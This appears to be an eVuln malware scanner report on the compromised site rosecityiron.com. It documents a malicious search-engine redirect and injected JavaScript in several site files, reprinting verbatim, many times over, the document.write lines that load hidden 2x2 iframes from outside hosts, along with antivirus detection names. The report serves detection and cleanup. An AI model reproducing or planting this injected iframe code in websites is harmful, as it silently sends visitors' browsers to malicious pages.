Malware Scanner report for rosecityiron.com

Malicious/Suspicious/Total urls checked: 11/0/15

11 pages have malicious code. See details below

Blacklists: OK

Malicious redirects: Found

The website redirects visitors from search engines to the 3rd-party URL:
->http://thegadgetspot.nl/cwhf.html?h=881056
25 websites infected.

The website "rosecityiron.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.

Malicious/Hidden/Total iFrames: 0/37/37

37 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

Request	Server response	Status
URL: http://rosecityiron.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: rosecityiron.com Referer: http://www.google.com/search?q=redirect+check1	HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 09:05:26 GMT Location: http://thegadgetspot.nl/cwhf.html?h=881056 Server: Apache Content-Length: 226 Content-Type: text/html; charset=iso-8859-1	malicious

Scanned pages/files

Request	Server response	Status
http://rosecityiron.com/	200 OK Content-Length: 12438 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?i=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?i=881056>
http://rosecityiron.com/./include/url.js	200 OK Content-Length: 15901 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSe ... 3616 bytes are skipped ...Y_KEY, sess_pair[0], true); return true; } return false; } // --------------------------------------------------------------------- function URL_getPrototypePair() { return { url : this.toExternalForm(true), parameters : this.getQueryString() } } // --------------------------------------------------------------------- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports: AntiVir HTML/TwitScroll.B Avast HTML:Iframe-BNK [Trj] Ad-Aware Trojan.Iframe.CEG Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CEG Comodo TrojWare.JS.Iframe.FK Emsisoft Trojan.Iframe.CEG (B) McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.473 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CEG Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CEG VIPRE Exploit.HTML.Iframe.dm (v) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CEG Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.JE BitDefender Trojan.Iframe.CEG Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html>
http://rosecityiron.com/./include/swfobject.js	200 OK Content-Length: 9315 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); ... 3459 bytes are skipped ...onbeforeunload = deconcept.SWFObjectUtil.prepUnload; } if (Array.prototype.push == null) { Array.prototype.push = function(item) { this[this.length] = item; return this.length; }} var getQueryParamValue = deconcept.util.getRequestParameter; var FlashObject = deconcept.SWFObject; var SWFObject = deconcept.SWFObject; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://gitmom.com/aeed.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056>
http://rosecityiron.com/./include/sitetree.js	200 OK Content-Length: 6633 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if (typeof(decodeURIComponent) == 'undefined') { decodeURIComponent = function(s) { return unescape(s); } ... 3614 bytes are skipped ...or = [ POS_NAME, POS_NAVIGATIONTEXT ]; for (var i=0 ; i < testFor.length ; i++) { var p = theSitetree.getByXx(lookup, testFor[i]); if (p != null) { page = p[POS_HREF]; break; } } } document.location.href = (new URL(__path_prefix__ + page, true, true)).toString(); }; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056>
http://rosecityiron.com/./301.html	200 OK Content-Length: 12438 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?i=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?i=881056>
http://rosecityiron.com/././include/url.js	200 OK Content-Length: 15901 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSe ... 3616 bytes are skipped ...Y_KEY, sess_pair[0], true); return true; } return false; } // --------------------------------------------------------------------- function URL_getPrototypePair() { return { url : this.toExternalForm(true), parameters : this.getQueryString() } } // --------------------------------------------------------------------- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports: AntiVir HTML/TwitScroll.B Avast HTML:Iframe-BNK [Trj] Ad-Aware Trojan.Iframe.CEG Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CEG Comodo TrojWare.JS.Iframe.FK Emsisoft Trojan.Iframe.CEG (B) McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.473 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CEG Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CEG VIPRE Exploit.HTML.Iframe.dm (v) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CEG Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.JE BitDefender Trojan.Iframe.CEG Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056>
http://rosecityiron.com/././include/swfobject.js	200 OK Content-Length: 9315 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); ... 3459 bytes are skipped ...onbeforeunload = deconcept.SWFObjectUtil.prepUnload; } if (Array.prototype.push == null) { Array.prototype.push = function(item) { this[this.length] = item; return this.length; }} var getQueryParamValue = deconcept.util.getRequestParameter; var FlashObject = deconcept.SWFObject; var SWFObject = deconcept.SWFObject; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://gitmom.com/aeed.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056>
http://rosecityiron.com/././include/sitetree.js	200 OK Content-Length: 6633 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if (typeof(decodeURIComponent) == 'undefined') { decodeURIComponent = function(s) { return unescape(s); } ... 3614 bytes are skipped ...or = [ POS_NAME, POS_NAVIGATIONTEXT ]; for (var i=0 ; i < testFor.length ; i++) { var p = theSitetree.getByXx(lookup, testFor[i]); if (p != null) { page = p[POS_HREF]; break; } } } document.location.href = (new URL(__path_prefix__ + page, true, true)).toString(); }; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html>
http://rosecityiron.com/././301.html	200 OK Content-Length: 12438 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?i=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?i=881056>
http://rosecityiron.com/./././include/url.js	200 OK Content-Length: 15901 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSe ... 3616 bytes are skipped ...Y_KEY, sess_pair[0], true); return true; } return false; } // --------------------------------------------------------------------- function URL_getPrototypePair() { return { url : this.toExternalForm(true), parameters : this.getQueryString() } } // --------------------------------------------------------------------- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports: AntiVir HTML/TwitScroll.B Avast HTML:Iframe-BNK [Trj] Ad-Aware Trojan.Iframe.CEG Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CEG Comodo TrojWare.JS.Iframe.FK Emsisoft Trojan.Iframe.CEG (B) McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.473 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CEG Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CEG VIPRE Exploit.HTML.Iframe.dm (v) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CEG Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.JE BitDefender Trojan.Iframe.CEG Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056>
http://rosecityiron.com/./././include/swfobject.js	200 OK Content-Length: 9315 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); ... 3459 bytes are skipped ...onbeforeunload = deconcept.SWFObjectUtil.prepUnload; } if (Array.prototype.push == null) { Array.prototype.push = function(item) { this[this.length] = item; return this.length; }} var getQueryParamValue = deconcept.util.getRequestParameter; var FlashObject = deconcept.SWFObject; var SWFObject = deconcept.SWFObject; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://gitmom.com/aeed.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html>
http://rosecityiron.com/./././include/sitetree.js	200 OK Content-Length: 6633 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if (typeof(decodeURIComponent) == 'undefined') { decodeURIComponent = function(s) { return unescape(s); } ... 3614 bytes are skipped ...or = [ POS_NAME, POS_NAVIGATIONTEXT ]; for (var i=0 ; i < testFor.length ; i++) { var p = theSitetree.getByXx(lookup, testFor[i]); if (p != null) { page = p[POS_HREF]; break; } } } document.location.href = (new URL(__path_prefix__ + page, true, true)).toString(); }; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056>
http://rosecityiron.com/./././301.html	200 OK Content-Length: 12438 Content-Type: text/html	suspicious
Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?i=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?i=881056>
http://rosecityiron.com/././././include/url.js	200 OK Content-Length: 15901 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); var CM_SESSION_KEY_KEY = "cmSessionKeyKey"; function getSessionPair(loc) { return URL.getSessionPair(loc); } function getSe ... 3616 bytes are skipped ...Y_KEY, sess_pair[0], true); return true; } return false; } // --------------------------------------------------------------------- function URL_getPrototypePair() { return { url : this.toExternalForm(true), parameters : this.getQueryString() } } // --------------------------------------------------------------------- document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports: AntiVir HTML/TwitScroll.B Avast HTML:Iframe-BNK [Trj] Ad-Aware Trojan.Iframe.CEG Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CEG Comodo TrojWare.JS.Iframe.FK Emsisoft Trojan.Iframe.CEG (B) McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.473 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CEG Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CEG VIPRE Exploit.HTML.Iframe.dm (v) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CEG Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.JE BitDefender Trojan.Iframe.CEG Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://ourdatabase.info/mood.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ourdatabase.info/mood.html?j=881056>
http://rosecityiron.com/././././include/swfobject.js	200 OK Content-Length: 9315 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056></iframe>'); if(typeof deconcept == "undefined") var deconcept = new Object(); if(typeof deconcept.util == "undefined") deconcept.util = new Object(); ... 3459 bytes are skipped ...onbeforeunload = deconcept.SWFObjectUtil.prepUnload; } if (Array.prototype.push == null) { Array.prototype.push = function(item) { this[this.length] = item; return this.length; }} var getQueryParamValue = deconcept.util.getRequestParameter; var FlashObject = deconcept.SWFObject; var SWFObject = deconcept.SWFObject; document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html></iframe>'); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://thegadgetspot.nl/cwhf.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thegadgetspot.nl/cwhf.html?j=881056> Hidden iFrame found. size: 2x2 src: http://salvadorpostigo.com/hzwd.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzwd.html> Hidden iFrame found. size: 2x2 src: http://gitmom.com/aeed.html?j=881056 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gitmom.com/aeed.html?j=881056>

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=rosecityiron.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://rosecityiron.com/

Result: rosecityiron.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for rosecityiron.com

Malware & Hack Repair

Website Hack Insurance

Malicious/Suspicious Redirects

Scanned pages/files

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools